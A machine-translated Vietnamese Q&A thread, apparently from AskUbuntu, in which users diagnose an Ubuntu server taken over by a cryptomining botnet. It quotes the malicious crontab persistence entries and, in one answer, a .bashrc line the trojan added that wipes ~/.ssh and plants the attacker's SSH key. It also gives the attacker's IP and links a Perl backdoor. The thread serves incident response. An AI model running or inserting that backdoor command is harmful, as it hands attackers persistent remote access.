Công việc Cron lạ chiếm 100% CPU Ubuntu 18 LTS Server

21

Tôi tiếp tục nhận được các công việc định kỳ xuất hiện và tôi không biết họ làm gì. Tôi thường phát lệnh kill -9 để ngăn chặn chúng. Chúng chiếm 100% CPU của tôi và có thể chạy trong nhiều ngày cho đến khi tôi kiểm tra. Có ai biết điều này?

sudo crontab -l
0 0 */3 * * /root/.firefoxcatche/a/upd>/dev/null 2>&1
@reboot /root/.firefoxcatche/a/upd>/dev/null 2>&1
5 8 * * 0 /root/.firefoxcatche/b/sync>/dev/null 2>&1
@reboot /root/.firefoxcatche/b/sync>/dev/null 2>&1
#5 1 * * * /tmp/.X13-unix/.rsync/c/aptitude>/dev/null 2>&1

Tôi đang chạy máy chủ Ubuntu 18 LTS cập nhật đầy đủ kể từ ngày 24 tháng 7 năm 2019

CẬP NHẬT

Tôi đánh giá cao tất cả các thông tin phản hồi. Tôi đã ngắt kết nối tất cả các ổ đĩa dữ liệu và ứng dụng vì điều duy nhất bị ảnh hưởng là ổ đĩa hệ điều hành, ít nhất tôi đã làm điều đó đúng cách. Tôi sẽ xây dựng lại hoàn toàn, với nhiều phương thức bảo mật hơn và an toàn hơn.

server  cron  rsync 
MCP_infiltrator
nguồn
8
.firefoxcatchecó lẽ không có gì để làm với firefox - đây có thể chỉ là một công cụ khai thác bitcoin không? Hãy thử tải lên các tệp thực thi lên virustotal.
Thom Wiggers
1
Các tập tin được điều hành bởi crontab đó là /root/.firefoxcatche/a/upd/root/.firefoxcatche/b/sync
Thom Wiggers
2
"Tôi không thể tìm thấy crontab để băm nó ra" điều đó có nghĩa là gì? Tại sao sudo crontab -echỉnh sửa không hoạt động? Nhưng nếu đây là một loại tiền điện tử mà bạn không cài đặt ... chúng sẽ được thêm lại. Cái nhìn đầu tiên trong "/root/.firefoxcatche/a/upd" những gì nó làm.
Rinzwind
2
"Tôi có phải đăng nhập bằng root để đến đó không?" Đây là câu hỏi tôi không mong đợi để xem từ quản trị viên. Bạn thực sự cần phải biết những gì bạn đang làm từ bây giờ. Thay đổi mật khẩu quản trị viên càng sớm càng tốt. Kiểm tra các tập tin được liệt kê trong cron. Diệt trừ chúng.
Rinzwind
1
nhưng nó đơn giản ;-) Tôi duy trì hơn 10 trường hợp đám mây google. Với một kế hoạch dự phòng về bất cứ điều gì tôi có thể tưởng tượng sẽ đi sai. Nếu bất cứ điều gì như thế này xảy ra, tôi sẽ phá hủy cá thể gốc, tạo một cái mới, quét đĩa dữ liệu dựa vào bản sao, quét các khác biệt và sau đó gắn nó vào thể hiện. và việc thực hiện một cái gì đó để bẫy người này để ngăn chặn nó xảy ra một lần nữa. Trong trường hợp của tôi, tiền lương của tôi phụ thuộc vào nó ;-)
Rinzwind

Câu trả lời:

40

Máy của bạn rất có thể bị nhiễm mã hóa khai thác. Bạn có thể thấy người khác báo cáo tên tệp và hành vi tương tự khi phát hiện thực tế của một máy ảo trong Azure với Trung tâm bảo mật . Xem thêm Máy chủ Ubuntu của tôi có vi-rút ... Tôi đã tìm thấy nó nhưng tôi không thể thoát khỏi nó ... trên Reddit.

Bạn không còn có thể tin tưởng vào máy đó và nên cài đặt lại. Hãy cẩn thận với việc khôi phục bản sao lưu.

Thom Wiggers
nguồn
8
Tôi đồng ý. mật khẩu root đã bị xâm nhập nên cài đặt lại và rất cẩn thận với bản sao lưu; nó cũng có thể ở đó
Rinzwind
9

Máy của bạn đã bị nhiễm một cuộc tấn công khai thác tiền điện tử. Tôi cũng đã phải đối mặt với một cuộc tấn công ransomware tương tự trong quá khứ và cơ sở dữ liệu của tôi đã bị xâm phạm. Tôi đã lấy một kết xuất SQL cho máy và phê duyệt lại máy (vì máy của tôi là máy ảo được lưu trữ trên AWS EC2). Tôi cũng đã sửa đổi các nhóm bảo mật của máy để khóa truy cập SSH và sửa đổi mật khẩu. Tôi cũng cho phép đăng nhập để ghi nhật ký truy vấn và xuất nó sang S3 mỗi đêm.

beadityak
nguồn
4

Điều tương tự cũng xảy ra với tôi, và tôi nhận thấy ngày hôm qua. Tôi đã kiểm tra tệp /var/log/syslogvà IP này (185.234.218.40) dường như đang tự động thực thi cronjobs.

Tôi đã kiểm tra nó trên http://whatismyipaddress.com ( https://whatismyipaddress.com/ip/185.234.218.40 ) và nó có một số báo cáo. Những tập tin này đã được chỉnh sửa bởi trojan:

  • .bashrc
  • .ssh / ủy quyền

Tôi đã tìm thấy điều này ở cuối .bashrc(được thực hiện mỗi khi bash được mở):

set +o history
export PATH=/home/user/.bin:$PATH
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod 700 .ssh && cd .ssh && chmod 600 authorized_keys && cd ~

Nó đang xóa authorized_keystệp của bạn , đây là danh sách các khóa SSH được phép kết nối mà không cần mật khẩu. Sau đó, nó thêm khóa SSH của kẻ tấn công:

ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr

Hơn nữa, tôi tìm thấy thư mục này : /tmp/.X13-unix/.rsync, nơi chứa tất cả các phần mềm độc hại. Tôi thậm chí đã tìm thấy một tệp, /tmp/.X13-unix/.rsync/c/ipmột tệp chứa 70 000 địa chỉ IP, rất có thể là các nạn nhân hoặc máy chủ nút khác.

Có 2 giải pháp: A:

  • Thêm tường lửa chặn tất cả các kết nối gửi ngoại trừ cổng 22 và các kết nối khác mà bạn thấy cần thiết và bật fail2ban, một chương trình cấm địa chỉ IP sau khi X thử mật khẩu không thành công

  • Giết tất cả các công việc định kỳ : ps aux | grep cron, sau đó tiêu diệt PID xuất hiện

  • Thay đổi mật khẩu của bạn thành một mật khẩu an toàn

B:

  • Sao lưu mọi tập tin hoặc thư mục mà bạn cần hoặc muốn

  • Đặt lại máy chủ và cài đặt lại Ubuntu hoặc trực tiếp tạo một giọt mới

    Giống như Thom Wiggers đã nói, bạn chắc chắn là một phần của botnet khai thác bitcoin và máy chủ của bạn có cửa hậu . Cửa hậu sử dụng khai thác perl, một tệp nằm ở đây : /tmp/.X13-unix/.rsync/b/run, chứa cái này ( https://pastebin.com/ceP2jsUy )

Các thư mục đáng ngờ nhất mà tôi tìm thấy là:

  • /tmp/.X13-unix/.rsync

  • ~/.bashrc (đã được chỉnh sửa)

  • ~/.firefoxcatche

Cuối cùng, có một bài viết liên quan đến Cửa hậu Perl tại đây: https://blog.trendmicro.com/trendlabs-security-intellect/outlaw-hacking-groups-botnet-observed-s rảiing-miner-perl-based-backdoor /

Tôi hy vọng bạn thấy nó hữu dụng.

Oqhax
nguồn
Tôi đã xóa ổ đĩa os và cài đặt lại Ubuntu đã tạo một mật khẩu mới khá dài và các khóa ssh mới
MCP_infiltrator
Vâng, đó là một giải pháp tốt :)
Oqhax
Đây là một câu trả lời rất hữu ích - cảm ơn bạn đã nắm bắt được thực tế ~/.bashrcđã được chỉnh sửa. Tôi thấy rằng để giết chết không có thật rsynctôi phải đưa ra kill -9 <pid>.
Đồi Benny
Khi sử dụng trang web của chúng tôi, bạn xác nhận rằng bạn đã đọc và hiểu Chính sách cookieChính sách bảo mật của chúng tôi.
Licensed under cc by-sa 3.0 with attribution required.